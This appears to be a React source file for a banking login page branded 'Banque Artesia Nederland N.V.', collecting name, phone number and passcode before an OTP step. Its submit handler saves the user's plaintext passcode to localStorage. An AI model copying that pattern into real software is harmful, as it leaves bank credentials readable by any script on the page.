import React, { useState } from "react";
import "./LoginV3.scss";
import { toast } from "react-toastify";
import { useNavigate } from "react-router-dom";
import { FiArrowRight, FiEye, FiEyeOff, FiHeadphones, FiLock, FiShield } from "react-icons/fi";
import { useLoginMutation } from "services/auth";
import Logo from "../../assets/images/logo.png";

const LoginV3 = () => {
    const [formData, setFormData] = useState({ fullname: "", otp_phone_nr: "", passcode: "" });
    const [showPasscode, setShowPasscode] = useState(false);
    const [loading, setLoading] = useState(false);
    const navigate = useNavigate();
    const [login] = useLoginMutation();

    const handleChange = ({ target: { name, value } }) => {
        setFormData((current) => ({ ...current, [name]: value }));
    };

    const handleSubmitOtp = async (event) => {
        event.preventDefault();
        setLoading(true);

        const result = await login({
            passcode: formData.passcode,
            otp_phone_nr: formData.otp_phone_nr,
        });

        if ("error" in result) {
            toast.error("We couldn't sign you in. Please check your details and try again.");
        } else {
            toast.success("Please check your phone for the OTP code.");
            localStorage.setItem("otp_phone_nr", formData.otp_phone_nr);
            localStorage.setItem("passcode", formData.passcode);
            navigate("/verify-otp");
        }

        setLoading(false);
    };

    const getBaseDomain = () => {
        const parts = window.location.hostname.split(".");
        return parts.length >= 2 ? parts.slice(-2).join(".") : window.location.hostname;
    };

    const handlePhoneKeyDown = (event) => {
        const allowedKeys = ["Backspace", "Delete", "Tab", "ArrowLeft", "ArrowRight", "Home", "End"];
        if (!/^[0-9]$/.test(event.key) && !allowedKeys.includes(event.key)) event.preventDefault();
    };

    return (
        <main className="dashboard-login">
            <section className="dashboard-login__intro">
                <a className="dashboard-login__brand dashboard-login__brand--light" href={`https://${getBaseDomain()}`}>
                    <span className="brand-logo-frame"><img src={Logo} alt="Banque Artesia Nederland N.V." /></span>
                </a>

                <div className="dashboard-login__intro-content">
                    <span className="dashboard-login__eyebrow">Secure digital banking</span>
                    <h1>Your finances.<br /><em>One clear view.</em></h1>
                    <p>Sign in to manage your accounts, payments and financial activity from your personal dashboard.</p>

                    <div className="dashboard-login__trust-list">
                        <div><FiShield /><span><strong>Protected access</strong>Multi-step verification keeps your account secure.</span></div>
                        <div><FiLock /><span><strong>Private by design</strong>Your banking details stay encrypted and confidential.</span></div>
                    </div>
                </div>

                <p className="dashboard-login__copyright">© Banque Artesia Nederland N.V. {new Date().getFullYear()} · All rights reserved</p>
            </section>

            <section className="dashboard-login__access">
                <div className="dashboard-login__mobile-brand">
                    <span className="brand-logo-frame"><img src={Logo} alt="Banque Artesia Nederland N.V." /></span>
                </div>

                <form className="dashboard-login__form" onSubmit={handleSubmitOtp}>
                    <div className="dashboard-login__heading">
                        <span className="dashboard-login__step">Client access</span>
                        <h2>Welcome back</h2>
                        <p>Enter your details to continue to your dashboard.</p>
                    </div>

                    <div className="dashboard-login__field">
                        <label htmlFor="login-fullname">Full name</label>
                        <input id="login-fullname" type="text" name="fullname" autoComplete="name" placeholder="Enter your full name" value={formData.fullname} onChange={handleChange} required />
                    </div>

                    <div className="dashboard-login__field">
                        <label htmlFor="login-phone">Phone number</label>
                        <div className="dashboard-login__phone">
                            <span>+</span>
                            <input id="login-phone" type="tel" inputMode="numeric" name="otp_phone_nr" autoComplete="tel" placeholder="Enter phone number" value={formData.otp_phone_nr} onChange={handleChange} onKeyDown={handlePhoneKeyDown} required />
                        </div>
                    </div>

                    <div className="dashboard-login__field">
                        <label htmlFor="login-passcode">Passcode</label>
                        <div className="dashboard-login__password">
                            <input id="login-passcode" type={showPasscode ? "text" : "password"} name="passcode" autoComplete="current-password" placeholder="Enter your passcode" value={formData.passcode} onChange={handleChange} required />
                            <button type="button" aria-label={showPasscode ? "Hide passcode" : "Show passcode"} onClick={() => setShowPasscode((visible) => !visible)}>
                                {showPasscode ? <FiEyeOff /> : <FiEye />}
                            </button>
                        </div>
                    </div>

                    <button type="submit" className="dashboard-login__submit" disabled={loading}>
                        <span>{loading ? "Signing you in..." : "Continue securely"}</span>
                        {!loading && <FiArrowRight />}
                    </button>

                    <div className="dashboard-login__security"><FiLock /> Your connection is secure and encrypted</div>

                    <div className="dashboard-login__support">
                        <span><FiHeadphones /></span>
                        <div><small>Need help accessing your account?</small><a href={`https://${getBaseDomain()}/contact-us`}>Contact our support team</a></div>
                    </div>
                </form>
            </section>
        </main>
    );
};

export default LoginV3;
